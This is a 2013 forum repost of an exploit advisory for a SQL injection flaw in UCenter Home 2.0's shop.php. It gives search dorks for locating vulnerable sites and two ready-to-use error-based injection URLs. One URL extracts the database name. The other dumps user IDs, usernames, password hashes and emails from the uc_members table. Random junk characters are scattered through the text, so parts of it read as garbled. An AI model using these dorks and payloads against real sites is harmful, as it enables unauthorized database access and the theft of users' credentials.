中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

1 }2 ~1 s' D& V2 G" i2 d__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
2 l/ i6 L$ j6 P6 B3 I
/ B  ?" [/ p3 C, @- @                                 ' E( R/ L! l" c* C3 d$ |+ l  a
0 X( P* F9 h! A. V2 y
*/ Author : KnocKout  5 n) M! u& _/ o, K0 I& P

) c% `+ _$ c: G9 U*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  7 P1 Y" S& C5 B7 [

& P, b! I/ o' y3 p*/ Contact: knockoutr@msn.com  
" D$ ~" Z( e( r: X% H5 T
3 Y: m% [$ y1 q. Y( U*/ Cyber-Warrior.org/CWKnocKout  
  K' _, W2 _, R$ G% Y4 B  ^2 M8 M' d. b& k
: b: ?2 t, x6 A7 z; K  r* ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  * Q& k! I3 h0 h' e

. x. C# j" R9 Z+ u5 Q) K4 lScript : UCenter Home  # c4 m" }0 g1 J/ O9 Z
# t3 u  \) p6 m6 ]
Version : 2.0  
* T7 h  E( k7 X% ~6 e" }  }1 M/ C0 Y
Script HomePage : http://u.discuz.net/  
% i6 q. u, C% T! J( l% t% D6 T& d, s0 K; m# W8 D; T0 t# D5 c$ s
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
0 ~' O6 j5 K+ {2 U
+ V3 G0 \* O2 F8 z, ]3 J& Y! ?: nDork : Powered by UCenter inurl:shop.php?ac=view  . @; ^+ P8 T; F& d4 N( V  `
1 }5 s1 X3 B# T: J0 {$ A) R7 }& e! ?
Dork 2 : inurl:shop.php?ac=view&shopid=  
  p2 A2 b) V, s2 b3 p5 X9 J; l; f9 A* ?2 ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
2 J9 G4 ~* K1 K; j: C
1 d6 ^# C/ s! N- j" WVuln file : Shop.php  
( L0 D0 F5 S  H' d
. {  l# v& f- Xvalue's : (?)ac=view&shopid=  
2 O% U" T+ t8 N! W3 @8 `, `# U% Q9 \' e2 n) U  U0 x2 M! e
Vulnerable Style : SQL Injection (MySQL Error Based)  
  w% f* @& e7 N! N6 ]* \  x* W0 s) @9 e5 {% g
Need Metarials : Hex Conversion  / \: W7 _9 l  E5 ~9 R

) E  d' e. y6 X- g' ^/ A__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  2 w' @5 A8 l! w2 \2 [2 F

; L: e3 f& m  H- uYour Need victim Database name.   
7 n  k3 O4 Z4 _8 X
2 L4 D% b1 b; w& s. tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  1 L- @7 H/ R: B  z& q, U
1 {8 g1 l& C& j& K
..  
7 B4 e* \. [8 n6 q" u- d5 T6 d, E' ]
DB : Okey.  + k) m! w3 s9 K- a- L1 a

: a; y& p* [/ D" k' S$ k4 \your edit DB `[TARGET DB NAME]`  2 N5 ^4 u# ^4 J  x4 H; J7 g' g. p; H1 `
/ J! n+ F. v* p" r* b
Example : 'hiwir1_ucenter'  
$ h# `: \( ]; y% M5 ~
  ^* Q% \  Q3 e  a$ q' j+ fEdit : Okey.  ' j6 ~# @- u/ N' G. c! |' K
' x9 _0 L9 y0 I6 D
Your use Hex conversion. And edit Your SQL Injection Exploit..  
' W2 a& ?( H3 ?3 ?
) S1 X" Z& @8 `# P& A5 ^! Z' t   7 B# E  O2 y' c& W5 \2 Q( e

/ r$ j; D( j4 X' g* UExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + w$ V+ c- ~2 k5 c: _3 V( k




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2